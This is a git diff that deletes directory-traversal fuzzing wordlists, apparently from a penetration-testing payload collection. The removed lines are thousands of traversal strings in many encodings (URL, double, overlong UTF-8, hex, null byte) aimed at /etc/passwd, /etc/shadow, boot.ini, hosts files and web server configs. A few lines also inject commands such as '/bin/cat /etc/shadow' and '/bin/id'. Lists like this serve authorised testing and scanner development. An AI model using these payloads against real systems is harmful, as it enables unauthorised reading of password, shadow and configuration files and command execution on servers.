-%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 -../../../../../../../../../../../../etc/hosts%00 -../../../../../../../../../../../../etc/hosts -../../boot.ini -/../../../../../../../../%2A -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../etc/shadow -/../../../../../../../../../../etc/passwd^^ -/../../../../../../../../../../etc/shadow^^ -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/shadow -/./././././././././././etc/passwd -/./././././././././././etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd -\..\..\..\..\..\..\..\..\..\..\etc\shadow -..\..\..\..\..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\..\..\..\..\etc\shadow -/..\../..\../..\../..\../..\../..\../etc/passwd -/..\../..\../..\../..\../..\../..\../etc/shadow -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -%0a/bin/cat%20/etc/passwd -%0a/bin/cat%20/etc/shadow -%00/etc/passwd%00 -%00/etc/shadow%00 -%00../../../../../../etc/passwd -%00../../../../../../etc/shadow -/../../../../../../../../../../../etc/passwd%00.jpg -/../../../../../../../../../../../etc/passwd%00.html -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -../../../../../../../../conf/server.xml -/../../../../../../../../bin/id| -C:/inetpub/wwwroot/global.asa -C:\inetpub\wwwroot\global.asa -C:/boot.ini -C:\boot.ini -../../../../../../../../../../../../localstart.asp%00 -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../boot.ini -/./././././././././././boot.ini -/../../../../../../../../../../../boot.ini%00 -/../../../../../../../../../../../boot.ini -/..\../..\../..\../..\../..\../..\../boot.ini -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -\..\..\..\..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -..\..\..\..\..\..\..\..\..\..\boot.ini -/../../../../../../../../../../../boot.ini%00.html -/../../../../../../../../../../../boot.ini%00.jpg -/.../.../.../.../.../ -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd -/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd -/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd -/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd diff --git a/Directory Traversal/Intruder/dotdotpwn.txt b/Directory Traversal/Intruder/dotdotpwn.txt deleted file mode 100644 index 9048ad5..0000000 --- a/Directory Traversal/Intruder/dotdotpwn.txt +++ /dev/null @@ -1,21144 +0,0 @@ -../etc/passwd -../etc/issue -../boot.ini -../windows/system32/drivers/etc/hosts -../../etc/passwd -../../etc/issue -../../boot.ini -../../windows/system32/drivers/etc/hosts -../../../etc/passwd -../../../etc/issue -../../../boot.ini -../../../windows/system32/drivers/etc/hosts -../../../../etc/passwd -../../../../etc/issue -../../../../boot.ini -../../../../windows/system32/drivers/etc/hosts -../../../../../etc/passwd -../../../../../etc/issue -../../../../../boot.ini -../../../../../windows/system32/drivers/etc/hosts -../../../../../../etc/passwd -../../../../../../etc/issue -../../../../../../boot.ini -../../../../../../windows/system32/drivers/etc/hosts -..\etc\passwd -..\etc\issue -..\boot.ini -..\windows\system32\drivers\etc\hosts -..\..\etc\passwd -..\..\etc\issue -..\..\boot.ini -..\..\windows\system32\drivers\etc\hosts -..\..\..\etc\passwd -..\..\..\etc\issue -..\..\..\boot.ini -..\..\..\windows\system32\drivers\etc\hosts -..\..\..\..\etc\passwd -..\..\..\..\etc\issue -..\..\..\..\boot.ini -..\..\..\..\windows\system32\drivers\etc\hosts -..\..\..\..\..\etc\passwd -..\..\..\..\..\etc\issue -..\..\..\..\..\boot.ini -..\..\..\..\..\windows\system32\drivers\etc\hosts -..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\etc\issue -..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\windows\system32\drivers\etc\hosts -..%2fetc%2fpasswd -..%2fetc%2fissue -..%2fboot.ini -..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%2f..%2fetc%2fpasswd -..%2f..%2fetc%2fissue -..%2f..%2fboot.ini -..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%2f..%2f..%2fetc%2fpasswd -..%2f..%2f..%2fetc%2fissue -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%2f..%2f..%2f..%2fetc%2fpasswd -..%2f..%2f..%2f..%2fetc%2fissue -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%2f..%2f..%2f..%2f..%2fetc%2fpasswd -..%2f..%2f..%2f..%2f..%2fetc%2fissue -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd -..%2f..%2f..%2f..%2f..%2f..%2fetc%2fissue -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..%5cetc%5cpasswd -..%5cetc%5cissue -..%5cboot.ini -..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%5c..%5cetc%5cpasswd -..%5c..%5cetc%5cissue -..%5c..%5cboot.ini -..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%5c..%5c..%5cetc%5cpasswd -..%5c..%5c..%5cetc%5cissue -..%5c..%5c..%5cboot.ini -..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%5c..%5c..%5c..%5cetc%5cpasswd -..%5c..%5c..%5c..%5cetc%5cissue -..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%5c..%5c..%5c..%5c..%5cetc%5cpasswd -..%5c..%5c..%5c..%5c..%5cetc%5cissue -..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd -..%5c..%5c..%5c..%5c..%5c..%5cetc%5cissue -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..0x2fetc0x2fpasswd -..0x2fetc0x2fissue -..0x2fboot.ini -..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x2f..0x2fetc0x2fpasswd -..0x2f..0x2fetc0x2fissue -..0x2f..0x2fboot.ini -..0x2f..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x2f..0x2f..0x2fetc0x2fpasswd -..0x2f..0x2f..0x2fetc0x2fissue -..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd -..0x2f..0x2f..0x2f..0x2fetc0x2fissue -..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd -..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fissue -..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fissue -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..0x5cetc0x5cpasswd -..0x5cetc0x5cissue -..0x5cboot.ini -..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..0x5c..0x5cetc0x5cpasswd -..0x5c..0x5cetc0x5cissue -..0x5c..0x5cboot.ini -..0x5c..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..0x5c..0x5c..0x5cetc0x5cpasswd -..0x5c..0x5c..0x5cetc0x5cissue -..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd -..0x5c..0x5c..0x5c..0x5cetc0x5cissue -..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd -..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cissue -..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cissue -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..%252fetc%252fpasswd -..%252fetc%252fissue -..%252fboot.ini -..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%252f..%252fetc%252fpasswd -..%252f..%252fetc%252fissue -..%252f..%252fboot.ini -..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%252f..%252f..%252fetc%252fpasswd -..%252f..%252f..%252fetc%252fissue -..%252f..%252f..%252fboot.ini -..%252f..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%252f..%252f..%252f..%252fetc%252fpasswd -..%252f..%252f..%252f..%252fetc%252fissue -..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%252f..%252f..%252f..%252f..%252fetc%252fpasswd -..%252f..%252f..%252f..%252f..%252fetc%252fissue -..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd -..%252f..%252f..%252f..%252f..%252f..%252fetc%252fissue -..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -..%252f..%252f..%252f..%252f..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..%255cetc%255cpasswd -..%255cetc%255cissue -..%255cboot.ini -..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%255c..%255cetc%255cpasswd -..%255c..%255cetc%255cissue -..%255c..%255cboot.ini -..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%255c..%255c..%255cetc%255cpasswd -..%255c..%255c..%255cetc%255cissue -..%255c..%255c..%255cboot.ini -..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%255c..%255c..%255c..%255cetc%255cpasswd -..%255c..%255c..%255c..%255cetc%255cissue -..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%255c..%255c..%255c..%255c..%255cetc%255cpasswd -..%255c..%255c..%255c..%255c..%255cetc%255cissue -..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd -..%255c..%255c..%255c..%255c..%255c..%255cetc%255cissue -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -..%255c..%255c..%255c..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..%c0%2fetc%c0%2fpasswd -..%c0%2fetc%c0%2fissue -..%c0%2fboot.ini -..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%2f..%c0%2fetc%c0%2fpasswd -..%c0%2f..%c0%2fetc%c0%2fissue -..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd -..%c0%2f..%c0%2f..%c0%2fetc%c0%2fissue -..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd -..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fissue -..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fissue -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fissue -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..%c0%afetc%c0%afpasswd -..%c0%afetc%c0%afissue -..%c0%afboot.ini -..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%af..%c0%afetc%c0%afpasswd -..%c0%af..%c0%afetc%c0%afissue -..%c0%af..%c0%afboot.ini -..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%af..%c0%af..%c0%afetc%c0%afpasswd -..%c0%af..%c0%af..%c0%afetc%c0%afissue -..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd -..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afissue -..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afissue -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afissue -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..%c0%5cetc%c0%5cpasswd -..%c0%5cetc%c0%5cissue -..%c0%5cboot.ini -..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c0%5c..%c0%5cetc%c0%5cpasswd -..%c0%5c..%c0%5cetc%c0%5cissue -..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c0%5c..%c0%5c..%c0%5cetc%c0%5cpasswd -..%c0%5c..%c0%5c..%c0%5cetc%c0%5cissue -..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cpasswd -..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cissue -..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cpasswd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cissue -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cpasswd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%c0%5cissue -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..%c1%9cetc%c1%9cpasswd -..%c1%9cetc%c1%9cissue -..%c1%9cboot.ini -..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%9c..%c1%9cetc%c1%9cpasswd -..%c1%9c..%c1%9cetc%c1%9cissue -..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd -..%c1%9c..%c1%9c..%c1%9cetc%c1%9cissue -..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd -..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cissue -..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cissue -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cissue -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cboot.ini -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%c1%pcetc%c1%pcpasswd -..%c1%pcetc%c1%pcissue -..%c1%pcboot.ini -..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c1%pc..%c1%pcetc%c1%pcpasswd -..%c1%pc..%c1%pcetc%c1%pcissue -..%c1%pc..%c1%pcboot.ini -..%c1%pc..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c1%pc..%c1%pc..%c1%pcetc%c1%pcpasswd -..%c1%pc..%c1%pc..%c1%pcetc%c1%pcissue -..%c1%pc..%c1%pc..%c1%pcboot.ini -..%c1%pc..%c1%pc..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcpasswd -..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcissue -..%c1%pc..%c1%pc..%c1%pc..%c1%pcboot.ini -..%c1%pc..%c1%pc..%c1%pc..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcpasswd -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcissue -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcboot.ini -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcpasswd -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcetc%c1%pcissue -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcboot.ini -..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%c0%9vetc%c0%9vpasswd -..%c0%9vetc%c0%9vissue -..%c0%9vboot.ini -..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%9v..%c0%9vetc%c0%9vpasswd -..%c0%9v..%c0%9vetc%c0%9vissue -..%c0%9v..%c0%9vboot.ini -..%c0%9v..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%9v..%c0%9v..%c0%9vetc%c0%9vpasswd -..%c0%9v..%c0%9v..%c0%9vetc%c0%9vissue -..%c0%9v..%c0%9v..%c0%9vboot.ini -..%c0%9v..%c0%9v..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vpasswd -..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vissue -..%c0%9v..%c0%9v..%c0%9v..%c0%9vboot.ini -..%c0%9v..%c0%9v..%c0%9v..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vpasswd -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vissue -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vboot.ini -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vpasswd -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vetc%c0%9vissue -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vboot.ini -..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%c0%qfetc%c0%qfpasswd -..%c0%qfetc%c0%qfissue -..%c0%qfboot.ini -..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c0%qf..%c0%qfetc%c0%qfpasswd -..%c0%qf..%c0%qfetc%c0%qfissue -..%c0%qf..%c0%qfboot.ini -..%c0%qf..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c0%qf..%c0%qf..%c0%qfetc%c0%qfpasswd -..%c0%qf..%c0%qf..%c0%qfetc%c0%qfissue -..%c0%qf..%c0%qf..%c0%qfboot.ini -..%c0%qf..%c0%qf..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfpasswd -..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfissue -..%c0%qf..%c0%qf..%c0%qf..%c0%qfboot.ini -..%c0%qf..%c0%qf..%c0%qf..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfpasswd -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfissue -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfboot.ini -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfpasswd -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfetc%c0%qfissue -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfboot.ini -..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%c1%8setc%c1%8spasswd -..%c1%8setc%c1%8sissue -..%c1%8sboot.ini -..%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%c1%8s..%c1%8setc%c1%8spasswd -..%c1%8s..%c1%8setc%c1%8sissue -..%c1%8s..%c1%8sboot.ini -..%c1%8s..%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%c1%8s..%c1%8s..%c1%8setc%c1%8spasswd -..%c1%8s..%c1%8s..%c1%8setc%c1%8sissue -..%c1%8s..%c1%8s..%c1%8sboot.ini -..%c1%8s..%c1%8s..%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts 